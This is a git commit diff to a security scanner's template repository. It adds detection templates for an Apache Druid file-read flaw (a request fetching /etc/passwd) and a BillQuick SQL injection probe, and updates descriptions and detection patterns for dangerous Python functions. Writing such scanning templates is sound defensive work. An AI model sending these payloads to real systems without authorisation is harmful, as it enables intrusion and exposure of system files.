Merge branch 'master' of https://github.com/projectdiscovery/nuclei-templates into CNVD-2019-06255

patch-1
sandeep 2021-10-26 17:23:01 +05:30
commit 50d1f3753d
19 changed files with 143 additions and 14 deletions

View File

@ -20,10 +20,8 @@ jobs:
- name: Installing Nuclei
# if: steps.cache-go.outputs.cache-hit != 'true'
env:
GO111MODULE: on
run: |
go install github.com/projectdiscovery/nuclei/v2/cmd/nuclei@dev
go install github.com/projectdiscovery/nuclei/v2/cmd/nuclei@latest
shell: bash
- name: Template Validation

View File

@ -53,7 +53,7 @@ An overview of the nuclei template project, including statistics on unique tags,
| wp-plugin | 178 | princechaddha | 66 | default-logins | 60 | | | | |
| cve2020 | 166 | madrobot | 63 | file | 50 | | | | |
**176 directories, 2418 files**.
**177 directories, 2443 files**.
</td>
</tr>

View File

@ -0,0 +1,35 @@
id: CVE-2021-36749
info:
name: Apache Druid Authentication Restrictions Bypass
author: _0xf4n9x_
severity: medium
description: In the Druid ingestion system, the InputSource is used for reading data from a certain data source. However, the HTTP InputSource allows authenticated users to read data from other sources than intended, such as the local file system, with the privileges of the Druid server process. This is not an elevation of privilege when users access Druid directly, since Druid also provides the Local InputSource, which allows the same level of access. But it is problematic when users interact with Druid indirectly through an application that allows users to specify the HTTP InputSource, but not the Local InputSource. In this case, users could bypass the application-level restriction by passing a file URL to the HTTP InputSource. This issue was previously mentioned as being fixed in 0.21.0 as per CVE-2021-26920 but was not fixed in 0.21.0 or 0.21.1.
reference:
- https://nvd.nist.gov/vuln/detail/CVE-2021-36749
- https://www.cvedetails.com/cve/CVE-2021-36749/
- https://github.com/BrucessKING/CVE-2021-36749
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H
cvss-score: 6.5
cve-id: CVE-2021-36749
cwe-id: CWE-668
tags: cve,cve2021,apache,lfi,auth-bypass
requests:
- raw:
- |
POST /druid/indexer/v1/sampler?for=connect HTTP/1.1
Host: {{Hostname}}
Content-Type: application/json
{"type":"index","spec":{"type":"index","ioConfig":{"type":"index","firehose":{"type":"http","uris":[" file:///etc/passwd "]}},"dataSchema":{"dataSource":"sample","parser":{"type":"string", "parseSpec":{"format":"regex","pattern":"(.*)","columns":["a"],"dimensionsSpec":{},"timestampSpec":{"column":"no_ such_ column","missingValue":"2010-01-01T00:00:00Z"}}}}},"samplerConfig":{"numRows":500,"timeoutMs":15000}}
matchers-condition: and
matchers:
- type: regex
part: body
regex:
- "root:.*:0:0:"
- "druid:*:1000:1000:"
condition: or

View File

@ -0,0 +1,64 @@
id: CVE-2021-42258
info:
name: BillQuick Web Suite SQLi
author: dwisiswant0
severity: high
tags: cve,cve2021,sqli,billquick
description: |
BQE BillQuick Web Suite 2018 through 2021 before 22.0.9.1
allows SQL injection for unauthenticated remote code execution,
as exploited in the wild in October 2021 for ransomware installation.
SQL injection can, for example, use the txtID (aka username) parameter.
Successful exploitation can include the ability to execute
arbitrary code as MSSQLSERVER$ via xp_cmdshell.
reference:
- https://www.huntress.com/blog/threat-advisory-hackers-are-exploiting-a-vulnerability-in-popular-billing-software-to-deploy-ransomware
- https://nvd.nist.gov/vuln/detail/CVE-2021-42258
requests:
- raw:
- |
GET / HTTP/1.1
Host: {{Hostname}}
- |
POST / HTTP/1.1
Host: {{Hostname}}
Referer: {{BaseURL}}
Origin: {{RootURL}}
Content-Type: application/x-www-form-urlencoded
__EVENTTARGET=cmdOK&__EVENTARGUMENT=&__VIEWSTATE={{url_encode("§VS§")}}&__VIEWSTATEGENERATOR={{url_encode("§VSG§")}}&__EVENTVALIDATION={{url_encode("§EV§")}}&txtID=uname%27&txtPW=passwd&hdnClientDPI=96
cookie-reuse: true
extractors:
- type: xpath
name: VS
internal: true
attribute: value
xpath:
- "/html/body/form/div/input[@id='__VIEWSTATE']"
- type: xpath
name: VSG
internal: true
attribute: value
xpath:
- "/html/body/form/div/input[@id='__VIEWSTATEGENERATOR']"
- type: xpath
name: EV
internal: true
attribute: value
xpath:
- "/html/body/form/div/input[@id='__EVENTVALIDATION']"
matchers:
- type: word
part: body
condition: and
words:
- "System.Data.SqlClient.SqlException"
- "Incorrect syntax near"
- "_ACCOUNTLOCKED"

View File

@ -0,0 +1,22 @@
id: redis-commander-exposure
info:
name: Redis Commander Exposure
author: dahse89
severity: low
reference:
- https://joeferner.github.io/redis-commander/
- https://github.com/joeferner/redis-commander
tags: panel,redis
requests:
- method: GET
path:
- '{{BaseURL}}'
matchers:
- type: word
condition: and
words:
- "<title>Redis Commander"
- "redisCommanderBearerToken"

View File

@ -4,7 +4,7 @@ info:
name: Python Scanner
author: majidmc2
severity: info
description: Scan for dangerous Python functions
description: Indicators for dangerous Python functions
reference:
- https://www.kevinlondon.com/2015/07/26/dangerous-python-functions.html
- https://www.kevinlondon.com/2015/08/15/dangerous-python-functions-pt2.html
@ -17,7 +17,7 @@ file:
extractors:
- type: regex
name: Possible Code Injection
name: code-injection
regex:
- 'exec'
- 'eval'
@ -25,7 +25,7 @@ file:
- type: regex
name: Possible Command Injection
name: command-injection
regex:
- 'subprocess.call\(.*shell=True.*\)'
- 'os.system'
@ -33,18 +33,18 @@ file:
- type: regex
name: Possibly Unpickling untrusted source
name: untrusted-source
regex:
- 'pickle.loads'
- 'cPickle.loads'
- type: regex
name: Possibly loading dangerous YAMLs
name: dangerous-yaml
regex:
- 'yaml.load'
- type: regex
name: Possible SQLi
name: sqli
regex:
- 'cursor.execute'

View File

@ -4,7 +4,7 @@ info:
name: Solar-Log 500 2.8.2 - Incorrect Access Control
author: geeknik
severity: high
description: The web administration server for Solar-Log 500 all versions prior to 2.8.2 Build 52 does not require authentication, which allows arbitrary remote attackers>
description: The web administration server for Solar-Log 500 all versions prior to 2.8.2 Build 52 does not require authentication, which allows arbitrary remote attackers gain administrative privileges by connecting to the server
reference: https://www.exploit-db.com/exploits/49986
tags: solarlog,auth-bypass

View File

@ -3,6 +3,7 @@ info:
name: UEditor Arbitrary File Upload
author: princechaddha
severity: high
description: A vulnerability in UEditor allows remote unauthenticated attackers to upload arbitrary files to the server, this in turn can be used to make the application to execute their content as code.
reference:
- https://zhuanlan.zhihu.com/p/85265552
- https://www.freebuf.com/vuls/181814.html

View File

@ -3,6 +3,7 @@ info:
name: Unauthenticated Spark REST API
author: princechaddha
severity: medium
description: The remote Spark product's REST API interface does not appear to prevent unauthenticated users from accesing it.
reference: https://xz.aliyun.com/t/2490
tags: spark,unauth

View File

@ -4,6 +4,7 @@ info:
name: viewLinc viewLinc/5.1.2.367 (and sometimes 5.1.1.50) is vulnerable to CRLF Injection.
author: geeknik
severity: low
description: The viewLinc application allows remote attackers to inject a CRLF character into the responses returned by the product, this allows attackers to inject arbitrary HTTP headers into the response returned.
reference: https://www.vaisala.com/en/products/systems/indoor-monitoring-systems/viewlinc-continuous-monitoring-system
tags: crlf,viewlinc

View File

@ -4,6 +4,7 @@ info:
name: Vehicle Parking Management System 1.0 - Authentication Bypass
author: dwisiswant0
severity: high
description: The Vehicle Parking Management System allows remote attackers to bypass the authentication system by utilizing an SQL injection vulnerability in the 'password' parameter.
reference: https://www.exploit-db.com/exploits/48877
tags: auth-bypass
requests:

View File

@ -3,6 +3,7 @@ info:
name: WebUI 1.5b6 RCE
author: pikpikcu
severity: critical
description: WebUI's 'mainfile.php' endpoint contain a vulnerability that allows remote attackers to cause it to execute arbitrary code via the 'Logon' parameter.
reference: https://www.exploit-db.com/exploits/36821
tags: webui,rce

View File

@ -5,7 +5,7 @@ info:
author: pikpikcu
severity: medium
tags: xss
description: A vulnerability in WEMS Enterprise Manager allows remote attackers to inject arbitrary Javascript into the response return by the server by sending it to the '/guest/users/forgotten' endpoint and the 'email' parameter.
reference:
- https://packetstormsecurity.com/files/155777/WEMS-Enterprise-Manager-2.58-Cross-Site-Scripting.html

View File

@ -4,6 +4,7 @@ info:
name: SMTP WP Plugin Directory listing enabled
author: PR3R00T
severity: high
description: The WordPress Easy WP SMTP Plugin has its 'easy-wp-smtp' folder remotely acccessible and its content available for access.
reference: https://blog.nintechnet.com/wordpress-easy-wp-smtp-plugin-fixed-zero-day-vulnerability/
tags: wordpress,wp-plugin

View File

@ -4,6 +4,7 @@ info:
name: WordPress Attitude Themes 1.1.1 Open Redirection
author: 0x_Akoko
severity: low
description: The WordPress Attitude Themes allows remote attackers to redirect users to an attacker controlled URL.
reference: https://cxsecurity.com/issue/WLB-2020030183
tags: wordpress,wp-theme,redirect

View File

@ -4,6 +4,7 @@ info:
name: WordPress Weekender Newspaper Themes 9.0 - Open Redirection
author: 0x_Akoko
severity: low
description: The WordPress Weekender Newspaper Themes allows remote attackers to redirect users to an attacker controlled URL.
reference: https://cxsecurity.com/issue/WLB-2020040103
tags: wordpress,wp-plugin,redirect

View File

@ -3,6 +3,7 @@ info:
name: WordPress accessible wp-config
author: Kiblyn11,zomsop82,madrobot,geeknik,daffainfo,r12w4n
severity: high
description: The remote WordPress installation has the `wp-config` file remotely accessible and its content available for reading.
tags: wordpress,backup
requests:

View File

@ -4,6 +4,7 @@ info:
name: WordPress Oxygen-Theme Themes LFI
author: 0x_Akoko
severity: high
description: The WordPress Oxygen-Theme has a local file inclusion vulnerability in its 'download.php' and 'file' parameter.
tags: wordpress,wp-theme,lfi
reference: https://cxsecurity.com/issue/WLB-2019030178

View File

@ -4,7 +4,7 @@ info:
name: wordpress-upload-data
author: pussycat0x
severity: medium
description: Searches for Passwords in the wordpress uploads directory.
description: The remote WordPress installation contains a file 'data.txt' under the '/wp-content/uploads/' folder that has sensitive information inside it.
reference: https://www.exploit-db.com/ghdb/7040
tags: wordpress,listing